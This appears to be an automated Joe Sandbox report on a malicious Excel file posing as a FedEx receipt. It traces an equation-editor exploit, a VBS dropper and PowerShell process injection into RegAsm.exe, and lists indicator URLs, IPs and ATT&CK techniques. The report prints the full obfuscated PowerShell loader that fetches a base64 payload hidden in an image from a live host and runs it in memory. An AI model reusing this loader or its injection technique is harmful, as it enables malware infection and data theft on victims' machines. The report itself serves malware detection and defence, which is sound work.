            Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
            Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
            Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.csReference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
            Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('pvllink = ta4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235ta4'+'; pvlwebclient ='+' new-object system.net.webclient'+'; try { pvldownloadeddata = pvlwebcl'+'ient.downloaddata(pvllink) } catch { '+'write-h'+'ost ta4failed to download data from pvllinkta4 -foregroundcol'+'or red; exit };'+' if (pvldownloadeddata -ne pvlnull) { '+'pvlima'+'getex'+'t = [system.text.encoding]::utf8.getstring(pvldownloadeddata'+'); pvlstartfla'+'g = ta4<<base64_start>>ta4; pvlendflag = ta4<<base64_end>'+'>ta4; pvlstartindex = pvlimagetext.indexof('+'pvlstartfl'+'ag); pvlendindex '+'= pvlimag'+'etext.indexo'+'f(pvlend'+'flag); if (pvlstartindex -ge 0 -and '+'pvlendindex -gt pvlstartindex) { pvlstartindex'+' += pvlstartflag.length; pvlbase64length = pvlendi'+'ndex - pvlstartindex; '+'pvlbase64command = pvlimagetext.substring(pvlstartindex,'+' pvlbase64length)'+'; pv'+'lcomma'+'ndbytes = '+'[system.convert]::frombase64string(pvlbase64command);'+' pvlloadedassembly = [system.reflection.ass'+'embly]::load(pvlcommandb'+'ytes); pvltype = pvlloadedassembly'+'.gettype(ta4runpe.hometa4); pvlmethod = pvltype.getmethod(ta4vaita4).invoke(pvlnull, [object[]] (ta4txt.jnnb/77088/61.532.59.32//:ptthta4 , ta4desativadota4 , ta4desativadota4 , ta4desativadota4,ta4regasm'+'ta4,ta4ta4))'+' } }').replace(([char]80+[char]118+[char]76),'$').replace(([char]116+[char]65+[char]52),[string][char]39)| iex"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('pvllink = ta4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235ta4'+'; pvlwebclient ='+' new-object system.net.webclient'+'; try { pvldownloadeddata = pvlwebcl'+'ient.downloaddata(pvllink) } catch { '+'write-h'+'ost ta4failed to download data from pvllinkta4 -foregroundcol'+'or red; exit };'+' if (pvldownloadeddata -ne pvlnull) { '+'pvlima'+'getex'+'t = [system.text.encoding]::utf8.getstring(pvldownloadeddata'+'); pvlstartfla'+'g = ta4<<base64_start>>ta4; pvlendflag = ta4<<base64_end>'+'>ta4; pvlstartindex = pvlimagetext.indexof('+'pvlstartfl'+'ag); pvlendindex '+'= pvlimag'+'etext.indexo'+'f(pvlend'+'flag); if (pvlstartindex -ge 0 -and '+'pvlendindex -gt pvlstartindex) { pvlstartindex'+' += pvlstartflag.length; pvlbase64length = pvlendi'+'ndex - pvlstartindex; '+'pvlbase64command = pvlimagetext.substring(pvlstartindex,'+' pvlbase64length)'+'; pv'+'lcomma'+'ndbytes = '+'[system.convert]::frombase64string(pvlbase64command);'+' pvlloadedassembly = [system.reflection.ass'+'embly]::load(pvlcommandb'+'ytes); pvltype = pvlloadedassembly'+'.gettype(ta4runpe.hometa4); pvlmethod = pvltype.getmethod(ta4vaita4).invoke(pvlnull, [object[]] (ta4txt.jnnb/77088/61.532.59.32//:ptthta4 , ta4desativadota4 , ta4desativadota4 , ta4desativadota4,ta4regasm'+'ta4,ta4ta4))'+' } }').replace(([char]80+[char]118+[char]76),'$').replace(([char]116+[char]65+[char]52),[string][char]39)| iex"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts11
            Command and Scripting Interpreter
            1
            Browser Extensions
            311
            Process Injection
            1
            Masquerading
            OS Credential Dumping2
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            221
            Scripting
            1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media23
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts43
            Exploitation for Client Execution
            1
            DLL Side-Loading
            Logon Script (Windows)311
            Process Injection
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook11
            Deobfuscate/Decode Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
            Obfuscated Files or Information
            LSA Secrets1
            Remote System Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync13
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465865 Sample: FedEx Receipt_53065724643.xls Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 45 ilang.in 2->45 57 Snort IDS alert for network traffic 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 Antivirus detection for URL or domain 2->61 63 23 other signatures 2->63 9 EXCEL.EXE 57 56 2->9         started        signatures3 process4 dnsIp5 49 ilang.in 194.163.41.117, 443, 49163, 49165 NEXINTO-DE Germany 9->49 51 23.95.235.16, 49164, 49169, 49173 AS-COLOCROSSINGUS United States 9->51 39 C:\...\FedEx Receipt_53065724643.xls (copy), Composite 9->39 dropped 41 C:\Users\user\...\ima.imim.im.imim[1].doc, Rich 9->41 dropped 13 wscript.exe 1 9->13         started        17 WINWORD.EXE 337 37 9->17         started        20 AcroRd32.exe 21 9->20         started        file6 process7 dnsIp8 53 41.216.183.13, 49175, 80 AS40676US South Africa 13->53 75 System process connects to network (likely due to code injection or exploit) 13->75 77 Suspicious powershell command line found 13->77 79 Wscript starts Powershell (via cmd or directly) 13->79 87 3 other signatures 13->87 22 powershell.exe 12 4 13->22         started        55 ilang.in 17->55 31 C:\Users\user\AppData\...\ilang.in.url, MS 17->31 dropped 33 C:\Users\user\AppData\Roaming\...\BrlcB.url, MS 17->33 dropped 35 ~WRF{3A50CEE2-6F27...8-0FD0C2B7AD90}.tmp, Composite 17->35 dropped 37 C:\Users\user\AppData\Local\...\DD4612E1.doc, Rich 17->37 dropped 81 Microsoft Office launches external ms-search protocol handler (WebDAV) 17->81 83 Office viewer loads remote template 17->83 85 Microsoft Office drops suspicious files 17->85 26 EQNEDT32.EXE 12 17->26         started        file9 signatures10 process11 dnsIp12 47 uploaddeimagens.com.br 188.114.96.3, 443, 49176 CLOUDFLARENETUS European Union 22->47 65 Writes to foreign memory regions 22->65 67 Suspicious execution chain found 22->67 69 Injects a PE file into a foreign processes 22->69 29 RegAsm.exe 22->29         started        43 C:\...\magesofrosepetelflowerstogetitgrea.vBS, Unicode 26->43 dropped 71 Office equation editor establishes network connection 26->71 73 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 26->73 file13 signatures14 process15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            FedEx Receipt_53065724643.xls30%VirustotalBrowse
            FedEx Receipt_53065724643.xls29%ReversingLabsDocument-PDF.Exploit.CVE-2017-0199
            FedEx Receipt_53065724643.xls100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp100%AviraEXP/CVE-2017-11882.Gen
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://41.216.183.13/Users_API/syscore/file_B0%Avira URL Cloudsafe
            http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtr0%Avira URL Cloudsafe
            http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gif0%Avira URL Cloudsafe
            http://23.95.235.160%Avira URL Cloudsafe
            https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4;0%Avira URL Cloudsafe
            http://ilang.in/BrlcByX100%Avira URL Cloudmalware
            http://23.95.235.16/88077/BNP0%Avira URL Cloudsafe
            http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gifj0%Avira URL Cloudsafe
            http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txt0%Avira URL Cloudsafe
            http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtz0%Avira URL Cloudsafe
            http://23.95.240%Avira URL Cloudsafe
            https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462350%Avira URL Cloudsafe
            https://uploaddeimagens.com.br0%Avira URL Cloudsafe
            http://23.95.235.16/88077/BNNJ.txt0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            http://23.95.235.16/88077/ima/ima.imim.im.imim.doC0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            http://ilang.in/BrlcB100%Avira URL Cloudmalware
            http://ilang.in/100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            uploaddeimagens.com.br
            188.114.96.3
            truefalse
              unknown
              ilang.in
              194.163.41.117
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.giftrue
                • Avira URL Cloud: safe
                unknown
                http://ilang.in/BrlcBfalse
                • Avira URL Cloud: malware
                unknown
                http://23.95.235.16/88077/ima/ima.imim.im.imim.doCtrue
                • Avira URL Cloud: safe
                unknown
                http://23.95.235.16/88077/BNNJ.txttrue
                • Avira URL Cloud: safe
                unknown
                https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235false
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4;powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtrwscript.exe, 00000009.00000003.480557490.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481408431.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481147687.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481281597.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481123191.00000000004D6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://41.216.183.13/Users_API/syscore/file_Bwscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ilang.in/BrlcByXB9930000.0.dr, ~DF189859C23F2234A3.TMP.0.drtrue
                • Avira URL Cloud: malware
                unknown
                http://crl.entrust.net/server1.crl0powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://23.95.235.16powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ocsp.entrust.net03powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtzwscript.exe, 00000009.00000003.480862214.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.480557490.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481272894.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481430080.00000000004EB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://23.95.235.16/88077/BNPpowershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gifjEQNEDT32.EXE, 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtwscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481376582.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481166475.00000000004AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481370525.000000000049F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481299140.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, magesofrosepetelflowerstogetitgrea.vBS.7.dr, imagesofrosepetelflowerstogetitgreat[1].gif.7.drfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://23.95.24powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://uploaddeimagens.com.brpowershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://ocsp.entrust.net0Dpowershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.474007800.0000000002611000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://secure.comodo.com/CPS0powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://ilang.in/ilang.in.url.4.drfalse
                • Avira URL Cloud: malware
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                194.163.41.117
                ilang.inGermany
                6659NEXINTO-DEtrue
                23.95.235.16
                unknownUnited States
                36352AS-COLOCROSSINGUStrue
                188.114.96.3
                uploaddeimagens.com.brEuropean Union
                13335CLOUDFLARENETUSfalse
                41.216.183.13
                unknownSouth Africa
                40676AS40676UStrue
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1465865
                Start date and time:2024-07-02 07:51:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 28s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:1
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:FedEx Receipt_53065724643.xls
                Detection:MAL
                Classification:mal100.troj.expl.evad.winXLS@11/41@9/4
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 33
                • Number of non-executed functions: 129
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, WMIADAP.exe, conhost.exe
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                01:52:46API Interceptor35x Sleep call for process: EQNEDT32.EXE modified
                01:52:47API Interceptor89x Sleep call for process: wscript.exe modified
                01:52:49API Interceptor11x Sleep call for process: powershell.exe modified
                01:53:12API Interceptor110x Sleep call for process: AcroRd32.exe modified
                01:53:41API Interceptor3x Sleep call for process: RegAsm.exe modified
                InputOutput
                URL: Office document Model: gpt-4o
                ```json{  "riskscore": 9,  "reasons": "The document prominently displays the logo of a well-known brand (Office) which could be used to impersonate the brand and gain the user's trust. The text creates a sense of urgency and interest by instructing the user to 'Open the document in Microsoft Office' and to 'Enable Editing' and 'Enable Content' from the yellow bar above. These instructions are commonly used in phishing attacks to trick users into enabling macros, which can then execute malicious code. The combination of brand impersonation, urgency, and specific instructions to enable potentially harmful features significantly increases the risk of phishing or malware."}
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                194.163.41.117Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                • ilang.in/rIpoXp
                Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                • ilang.in/WRVAR
                Swift Advice 75,608$ USD.xlsGet hashmaliciousAgentTeslaBrowse
                • ilang.in/jFJIR
                Product Specification Details.xlsGet hashmaliciousRemcosBrowse
                • ilang.in/uMSjT
                June order.xlsGet hashmaliciousRemcosBrowse
                • ilang.in/vWyNr
                90405.xlsGet hashmaliciousUnknownBrowse
                • ilang.in/RpSUur
                90404.xlsGet hashmaliciousAgentTeslaBrowse
                • ilang.in/
                1561073.xlsGet hashmaliciousUnknownBrowse
                • ilang.in/ewqeB
                90404.xlsGet hashmaliciousUnknownBrowse
                • ilang.in/IInHM
                1561073.xlsGet hashmaliciousUnknownBrowse
                • ilang.in/ewqeB
                23.95.235.16statement .xlsGet hashmaliciousUnknownBrowse
                • 23.95.235.16/99122/innovationflowerpicturetoday.gif
                IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
                • 23.95.235.16/xampp/kob/MMD.txt
                LgTFM1JlJu.rtfGet hashmaliciousAgentTeslaBrowse
                • 23.95.235.16/5656/rcc.txt
                zBtnT85tsF.rtfGet hashmaliciousHTMLPhisherBrowse
                • 23.95.235.16/9088/lionsarejunglelivingalwaysthere.bmp
                SC_TR20240619.xlsGet hashmaliciousAgentTeslaBrowse
                • 23.95.235.16/9088/UHH.txt
                TransferNotice_Technoglass_SA_P240408-6K27VGO.jsGet hashmaliciousUnknownBrowse
                • 23.95.235.16/9022/RVG.txt
                vcb_#20240618000.xlsGet hashmaliciousUnknownBrowse
                • 23.95.235.16/9022/cfo/cbc.doc
                vcb_#20240618000.xlsGet hashmaliciousUnknownBrowse
                • 23.95.235.16/9022/cfo/cbc.doc
                vcb_#20240618000.xlsGet hashmaliciousUnknownBrowse
                • 23.95.235.16/9022/cfo/cbc.doc
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                ilang.inInvoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                • 194.163.41.117
                Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                • 194.163.41.117
                Swift Advice 75,608$ USD.xlsGet hashmaliciousAgentTeslaBrowse
                • 194.163.41.117
                Product Specification Details.xlsGet hashmaliciousRemcosBrowse
                • 194.163.41.117
                June order.xlsGet hashmaliciousRemcosBrowse
                • 194.163.41.117
                90405.xlsGet hashmaliciousUnknownBrowse
                • 194.163.41.117
                90404.xlsGet hashmaliciousAgentTeslaBrowse
                • 194.163.41.117
                1561073.xlsGet hashmaliciousUnknownBrowse
                • 194.163.41.117
                90404.xlsGet hashmaliciousUnknownBrowse
                • 194.163.41.117
                1561073.xlsGet hashmaliciousUnknownBrowse
                • 194.163.41.117
